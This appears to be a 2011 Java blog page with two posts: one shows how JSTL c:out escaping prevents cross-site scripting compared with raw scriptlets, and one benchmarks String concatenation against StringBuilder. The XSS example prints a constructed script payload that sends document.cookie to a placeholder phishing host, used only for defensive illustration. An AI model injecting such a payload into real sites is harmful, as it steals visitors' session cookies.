Posts

Showing posts from June, 2011

Use JSTL Tag to avoid Cross Site Scripting issue

JSTL is a familiar term to any web developer who builds dynamic content in JSP pages. Using it may be common practice nowadays, but the point below is still worth sharing and will be helpful... Many developers use a plain scriptlet to print user-supplied values in a JSP, e.g. String langId = request.getParameter("langId"); <%=langId %>      This may be the fastest way to write the code, but it is not the safest: the value is written into the page exactly as the user sent it, unescaped, which leaves the website vulnerable to Cross Site Scripting. A malicious user can use this hole to inject script that redirects visitors to a phishing website and captures sensitive user data. There are many ways to address the issue, but one of the better and simpler approaches is to use JSTL tags. These tags escape the output on their own, so the problem above is handled with no additional coding. If you use <c:out value=...
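As an added example (not code from the original post), the small Java program below puts the two JSP approaches side by side without needing a servlet container: the escapeXml method reproduces the five characters that JSTL's c:out escapes by default, and the two render methods emit what the scriptlet and the c:out tag would each write into the page. The payload string is constructed for the example.

```java
// Added example: what <%= langId %> emits versus what <c:out value="..."/>
// emits for the same attacker-controlled request parameter.
public class CoutEscapeDemo {

    // Mirrors JSTL's escapeXml="true" (the c:out default): < > & ' " are
    // replaced with character references so the browser treats them as text.
    static String escapeXml(String s) {
        if (s == null) return "";
        StringBuilder sb = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '&':  sb.append("&amp;");  break;
                case '\'': sb.append("&#039;"); break;
                case '"':  sb.append("&#034;"); break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // Equivalent of the scriptlet  <span class="lang"><%= langId %></span>
    // The raw parameter value lands in the HTML unchanged.
    static String renderWithScriptlet(String langId) {
        return "<span class=\"lang\">" + langId + "</span>";
    }

    // Equivalent of  <span class="lang"><c:out value="${param.langId}"/></span>
    // The same value is escaped before it reaches the HTML.
    static String renderWithCout(String langId) {
        return "<span class=\"lang\">" + escapeXml(langId) + "</span>";
    }

    public static void main(String[] args) {
        // Constructed payload: what an attacker might send as ?langId=...
        // (the phishing host is a placeholder, not a real site)
        String payload = "<script>location='http://phish.example/?c='+document.cookie</script>";

        System.out.println("scriptlet: " + renderWithScriptlet(payload));
        System.out.println("c:out    : " + renderWithCout(payload));

        // The scriptlet output contains a live <script> element; the c:out
        // output contains only &lt;script&gt;... which the browser renders as text.
        boolean scriptletIsLive = renderWithScriptlet(payload).contains("<script>");
        boolean coutIsInert = !renderWithCout(payload).contains("<script>");
        System.out.println("scriptlet injects script: " + scriptletIsLive);
        System.out.println("c:out output is inert:    " + coutIsInert);
    }
}
```

Two caveats a practitioner should keep in mind: the protection disappears if you write <c:out escapeXml="false">, and a bare EL expression in template text such as ${param.langId} is not escaped at all, so it is as unsafe as the scriptlet. This escaping is also only correct for HTML element content and quoted attribute values; a value dropped into a JavaScript block or a URL needs escaping appropriate to that context.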

String and String Buffer Comparison

Java String concatenation internally uses a string builder to do the work. When we write a concatenation as below in Java code, String str = a + b; where a and b are String objects, the Java compiler compiles it like this: String str = (new StringBuffer()).append(a).append(b).toString();     (Since Java 5 javac actually emits the unsynchronized StringBuilder here; StringBuffer is the older, thread-safe variant with the same API.) The above creates two objects, the builder and the resulting String, and since Java keeps string data in a char array, which is itself an object, at least one more object is created. So at least three objects are created for one concatenation operation, and object creation is one of the costlier operations in Java. The real cost shows up inside a loop: each str += x creates a fresh builder and a fresh String and copies the whole accumulated text again, so the work grows with the square of the number of iterations, whereas a single builder that is appended to throughout the loop grows its buffer in place and creates one String at the end.     I created one test program just to see the performance difference, and the results were dramatic... I ran both loops in the same program 1 million times. See the time difference... So based on the results below it is recommended to use StringBuffer.append (or StringBuilder.append) whenever you are doing concatenation in a loop in Java...     time taken ...
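As an added example (not the post's own test program), the class below writes out the two loops the post describes and times them. The iteration count is taken from the command line because the repeated "+=" loop is quadratic and 1 million iterations of it can take minutes; the default of 100,000 is an assumption chosen so both loops finish quickly.

```java
// Added example: timing repeated String "+=" against a single StringBuilder.
public class ConcatBenchmark {

    // Each "+=" compiles to a new builder plus a new String and copies the
    // whole accumulated text, so the total work grows quadratically in n.
    static String concatWithPlus(int n) {
        String s = "";
        for (int i = 0; i < n; i++) {
            s += "x";
        }
        return s;
    }

    // One builder grows its internal char array geometrically; only one
    // String is materialised, by toString() at the end.
    static String concatWithBuilder(int n) {
        StringBuilder sb = new StringBuilder();
        for (int i = 0; i < n; i++) {
            sb.append('x');
        }
        return sb.toString();
    }

    // Wall-clock time of r in milliseconds (coarse, but enough to show the gap).
    static long timeMillis(Runnable r) {
        long start = System.nanoTime();
        r.run();
        return (System.nanoTime() - start) / 1_000_000L;
    }

    public static void main(String[] args) {
        // Assumed default: 100,000 iterations; pass 1000000 to match the post.
        int n = args.length > 0 ? Integer.parseInt(args[0]) : 100_000;

        // Warm-up so the JIT has compiled both methods before timing.
        concatWithPlus(1_000);
        concatWithBuilder(1_000);

        long plusMs = timeMillis(() -> concatWithPlus(n));
        long builderMs = timeMillis(() -> concatWithBuilder(n));

        // Both loops must produce the same result for the comparison to be fair.
        boolean sameResult = concatWithPlus(n).equals(concatWithBuilder(n));

        System.out.println("iterations        : " + n);
        System.out.println("String +=         : " + plusMs + " ms");
        System.out.println("StringBuilder.append: " + builderMs + " ms");
        System.out.println("results identical : " + sameResult);
    }
}
```

Compile with javac ConcatBenchmark.java and run with java ConcatBenchmark 100000. Outside a loop a single a + b is already compiled to a builder, so rewriting it by hand gains nothing; the recommendation applies to concatenation that accumulates across iterations. Use StringBuilder unless the buffer is genuinely shared between threads, in which case StringBuffer's synchronized methods are the reason to pay its extra cost.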